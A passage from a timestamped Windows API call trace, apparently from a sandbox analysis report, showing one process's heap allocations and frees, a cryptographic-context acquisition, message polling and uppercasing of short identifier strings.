Flags=0x0, Size=0x4) returned 0x24b1818 [0258.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0258.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.194] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0258.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0258.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0258.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0258.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0258.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0258.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0258.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0258.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0258.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0258.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0258.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0258.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0258.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0258.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0258.201] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0258.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0258.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0258.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0258.202] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0258.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.202] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0258.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0258.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0258.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0258.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa370 [0258.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0258.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0258.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0258.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.203] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0258.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0258.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0258.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0258.204] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0258.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0258.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.204] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.204] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0258.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0258.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0258.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.205] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0258.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.206] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0258.206] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.206] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0258.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.206] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0258.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5e0 [0258.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.206] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0258.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0258.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0258.207] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0258.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0258.207] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.207] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0258.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0258.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) 